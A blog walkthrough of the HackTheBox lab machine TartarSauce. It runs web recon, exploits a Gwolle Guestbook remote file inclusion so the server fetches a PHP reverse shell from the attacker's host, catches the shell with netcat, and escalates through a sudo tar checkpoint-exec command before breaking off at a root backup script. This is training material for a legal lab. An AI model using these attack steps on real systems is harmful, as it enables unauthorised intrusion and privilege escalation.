This post is about the Walkthrough of the hackthebox machine: Tartarsauce

Hackthebox Tartarsauce Walkthrough Link to heading

tartar

Reconnaissance Link to heading

Initial Port scanning Link to heading
sudo nmap -sS -Pn -p- -T4 -sV -sC 10.10.10.88
ORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

nmap -p 80 -sC -sV -oN details.txt 10.10.10.88
nmap -p 80 --script vuln 10.10.10.88
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-23 20:46 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.88
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page


PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 321.09 seconds
Web pages founds Link to heading

This is the landing page

tartar

Robots.txt

tartar

monstra page-out of the directories mentioned above only this page works for me

tartar

As we know the application and version running , its beter to check for any exploit

earchsploit monstra   
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Monstra CMS 1.2.0 - 'login' SQL Injection                                                                                                 | php/webapps/38769.txt
Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities                                                                               | php/webapps/37651.html
Monstra CMS 3.0.3 - Multiple Vulnerabilities                                                                                              | php/webapps/39567.txt
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution                                                         | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion                                                                                             | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload                                                                                   | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting                                                                                        | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)                                                                                 | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)                                                                                            | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)                                                                                            | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)                                                                        | php/webapps/45164.txt
Directory Scanning Link to heading
obuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.88
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/23 20:44:04 Starting gobuster in directory enumeration mode
===============================================================
/webservices          (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/]
/server-status        (Status: 403) [Size: 299]                                      

===============================================================
2022/03/23 21:01:06 Finished
===============================================================
nikto -h http://10.10.10.88                   
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.88
+ Target Hostname:    10.10.10.88
+ Target Port:        80
+ Start Time:         2022-03-23 20:57:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/webservices/monstra-3.0.4/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2a0e, size: 565becf5ff08d, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7881 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-03-23 21:04:44 (GMT-4) (427 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Login Credentials and Rabithole Link to heading

The default login credentails works for me(admin/admin). Based on the searchsploit result. i have tried to upload the php reverse shell and it never worked. Some reason it never uploads any file. I have tried, .php,php7. This seems like rabithole.

I decided to use the different directory which i have found during the directory scan.

gobuster dir -u http://10.10.10.88//webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.88//webservices
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/25 21:54:56 Starting gobuster in directory enumeration mode
===============================================================
/wp                   (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]
Some more methods for Directory Scan to find the sub directories Link to heading
 
┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,301 http://10.10.10.88/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt"                                                                          
000000003:   200        563 L    128 W      10766 Ch    "# Copyright 2007 James Fisher"                                                                            
000000007:   200        563 L    128 W      10766 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                          
000000013:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000014:   200        563 L    128 W      10766 Ch    "http://10.10.10.88/"                                                                                      
000000012:   200        563 L    128 W      10766 Ch    "# on atleast 2 different hosts"                                                                           
000000011:   200        563 L    128 W      10766 Ch    "# Priority ordered case sensative list, where entries were found"                                         
000000008:   200        563 L    128 W      10766 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                                               
000000005:   200        563 L    128 W      10766 Ch    "# This work is licensed under the Creative Commons"                                                       
000000010:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000009:   200        563 L    128 W      10766 Ch    "# Suite 300, San Francisco, California, 94105, USA."                                                      
000000004:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000002:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000006:   200        563 L    128 W      10766 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                                            

000001967:   301        9 L      28 W       316 Ch      "webservices"                                                                                              
000016812:   404        9 L      32 W       278 Ch      "xbg"                                                                                                      

000045240:   200        563 L    128 W      10766 Ch    "http://10.10.10.88/"                                                                                      

Total time: 2743.707
Processed Requests: 84630

  wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.10.88/FUZZ/FUZ2Z
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/FUZZ/FUZ2Z
Total requests: 48646713600

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # directory-list-2.3-medium.txt"                                        
000000003:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # Copyright 2007 James Fisher"                                          
000000015:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - index"                                                                  
000000007:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # license, visit http://creativecommons.org/licenses/by-sa/3.0/"        
0                                                            

  wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.10.88/webservices/FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/webservices/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   403        11 L     32 W       298 Ch      "# directory-list-2.3-medium.txt"                                                                          
000000013:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000011:   403        11 L     32 W       298 Ch      "# Priority ordered case sensative list, where entries were found"                                         
000000007:   403        11 L     32 W       298 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                          
000000014:   403        11 L     32 W       298 Ch      "http://10.10.10.88/webservices/"                                                                          
000000012:   403        11 L     32 W       298 Ch      "# on atleast 2 different hosts"                                                                           
000000003:   403        11 L     32 W       298 Ch      "# Copyright 2007 James Fisher"                                                                            
000000010:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000005:   403        11 L     32 W       298 Ch      "# This work is licensed under the Creative Commons"                                                       
000000006:   403        11 L     32 W       298 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                                            
000000002:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000009:   403        11 L     32 W       298 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                                      
000000004:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000008:   403        11 L     32 W       298 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                               
000000793:   301        9 L      28 W       319 Ch      "wp"  
Link to heading

This was the wordpress site. I have spent more time on exploiting the monstra exploit which turned to be a rabithole in this case.

tartar

I started a wpscan and the basic scan did not not gave any vulnarability

┌──(rocky㉿kali)-[~]
└─$ cd ~/hckbox/tartarsauce                                                                                                                                             1 ⨯

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --url http://10.10.10.88/webservices/wp/                      
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Mar 26 20:09:14 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <=============================================================================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 20:09:26 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 44.54 KB
[+] Data Received: 65.214 KB
[+] Memory used: 185.23 MB
[+] Elapsed time: 00:00:12

The normal scan did not reveal much. So i have ran aggressive scan which took me around 30 mins. Results of aggressive wordpress scan is below:

$ 
[+

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --help                                   
_

    -e, --enumerate [OPTS]                        Enumeration Process
                                                  Available Choices:
                                                   vp   Vulnerable plugins
                                                   ap   All plugins
                                                   p    Popular plugins
                                                   vt   Vulnerable themes
                                                   at   All themes
                                                   t    Popular themes
                                                   tt   Timthumbs
                                                   cb   Config backups
                                                   dbe  Db exports
                                                   u    User IDs range. e.g: u1-5
                                                        Range separator to use: '-'
                                                        Value if no argument supplied: 1-10
                                                   m    Media IDs range. e.g m1-15
                                                        Note: Permalink setting must be set to "Plain" for those to be detected
                                                        Range separator to use: '-'
                                                        Value if no argument supplied: 1-100
                                                  Separator to use between the values: ','
                                                  Default: All Plugins, Config Backups
                                                  Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
                                                  Incompatible choices (only one of each group/s can be used):
                                                   - vp, ap, p
                                                   - vt, at, t
        --exclude-content-based REGEXP_OR_STRING  Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
                                                  Both the headers and body are checked. Regexp delimiters are not required.
        --plugins-detection MODE                  Use the supplied mode to enumerate Plugins.
                                                  Default: passive
                                                  Available choices: mixed, passive, aggressive
        --plugins-version-detection MODE          Use the supplied mode to check plugins' versions.
                                                  Default: mixed
                                                  Available choices: mixed, passive, aggressive


[!] To see full list of options use --hh.

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --url http://10.10.10.88/webservices/wp/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Mar 26 20:17:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:31:31 <=====================================================================                    > (75943 / 96368) 78.80%  ETA: 00:08:29
 Checking Known Locations - Time: 00:36:01 <========================================================================================> (96368 / 96368) 100.00% Time: 00:36:01
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2021-10-01T18:28:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2021-12-09T08:36:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 20:53:45 2022
[+] Requests Done: 96385
[+] Cached Requests: 31
[+] Data Sent: 28.066 MB
[+] Data Received: 12.944 MB
[+] Memory used: 359.363 MB
[+] Elapsed time: 00:36:18

There are 3 Vulnarable plugins found after aggressive scan

+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2021-10-01T18:28:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 | Confirmed By: 
[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2021-12-09T08:36:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
Initial Shell Link to heading

The vulnarability database shows exploit for below plugin:

rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ searchsploit gwolle 
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                                                                           | php/webapps/38861.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ locate 38861.txt
/usr/share/exploitdb/exploits/php/webapps/38861.txt

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/38861.txt .

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ cat 38861.txt                                           
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.

It taks about remote file exploit. I have edited the php reverse shell and renamed as wp-load.php and started a webserver on kali machine. This will run without any login credentials for wordpress site.

─$ cat wp-load.php                     
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//



─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.88 - - [27/Mar/2022 21:05:50] "GET /wp-load.php HTTP/1.0" 200 -

We have a reverse shell now after accessing below url. Make sure the netcat is running

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.17:8000/
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.88] 47994
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
 21:09:13 up  1:01,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@TartarSauce:/$ 
Privilege escalation to user onuma Link to heading

After typing sudo -l command it shows we can tar command without password. On checking GTFO bins site i got this command for privilege escalation.

sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
<ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh                
tar: Removing leading `/' from member names
whoami
whoami
onuma
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
onuma@TartarSauce:/$ 

I have run pspy to see if any process running on regular interval after seeing the home folder content for backup

/bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3849   | /bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3851   | /bin/mv /var/tmp/.c4d57a7eb1386f56d7a66495edc4b30b99595a14 /var/backups/onuma-www-dev.bak 
2022/03/27 21:39:12 CMD: UID=0    PID=3852   | /bin/rm -rf /var/tmp/check . .. 

022/03/27 21:39:01 CMD: UID=0    PID=3839   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3838   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3843   | sed -e s,@VERSION@,7.0, 
2022/03/27 21:39:01 CMD: UID=0    PID=3842   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3841   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3844   | pidof 
2022/03/27 21:39:01 CMD: UID=0    PID=3845   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:11 CMD: UID=0    PID=3848   | gzip -d 
2022/03/27 21:39:11 CMD: UID=0    PID=3847   | /bin/tar -zxvf /var/tmp/.c4d57a7eb1386f56d7a66495edc4b30b99595a14 -C /var/tmp/check 
2022/03/27 21:39:12 CMD: UID=0    PID=3850   | /bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3849   | /bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3851   | /bin/mv /var/tmp/.c4d57a7eb1386f56d7a66495edc4b30b99595a14 /var/backups/onuma-www-dev.bak 
2022/03/27 21:39:12 CMD: UID=0    PID=3852   | /bin/rm -rf /var/tmp/check . .. 

Lets see what this program"/usr/sbin/backuperer" does

cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
